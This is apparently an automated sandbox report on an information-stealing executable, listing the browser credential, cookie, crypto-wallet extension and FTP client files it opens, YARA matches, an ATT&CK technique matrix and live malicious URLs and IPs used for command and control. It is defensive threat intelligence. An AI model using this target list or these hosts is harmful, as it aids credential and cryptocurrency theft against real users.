              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1763547491.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1789605259.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1763473029.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1814476131.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1813653561.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              11
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              11
              Process Injection
              LSASS Memory741
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cook-rain.sbs/o100%Avira URL Cloudmalware
              http://185.215.113.16/off/def.exeqX100%Avira URL Cloudphishing
              http://185.215.113.16/jr100%Avira URL Cloudphishing
              https://cook-rain.sbs/apiu100%Avira URL Cloudmalware
              https://cook-rain.sbs/apivalue100%Avira URL Cloudmalware
              https://cook-rain.sbs/.100%Avira URL Cloudmalware
              https://cook-rain.sbs/apirvice100%Avira URL Cloudmalware
              http://185.215.113.16/off/def.exemX100%Avira URL Cloudphishing
              https://cook-rain.sbs/9100%Avira URL Cloudmalware
              https://cook-rain.sbs/C100%Avira URL Cloudmalware
              https://cook-rain.sbs/apid100%Avira URL Cloudmalware
              http://185.215.113.16/Er100%Avira URL Cloudphishing
              https://cook-rain.sbs/tP100%Avira URL Cloudmalware
              https://cook-rain.sbs/%100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              cook-rain.sbs
              104.21.66.38
              truefalse
                high
                www.google.com
                216.58.208.228
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        peepburry828.sbsfalse
                          high
                          p10tgrace.sbsfalse
                            high
                            processhol.sbsfalse
                              high
                              https://cook-rain.sbs/apifalse
                                high
                                https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                  high
                                  p3ar11fter.sbsfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_102.6.drfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cook-rain.sbs/Cfile.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpfalse
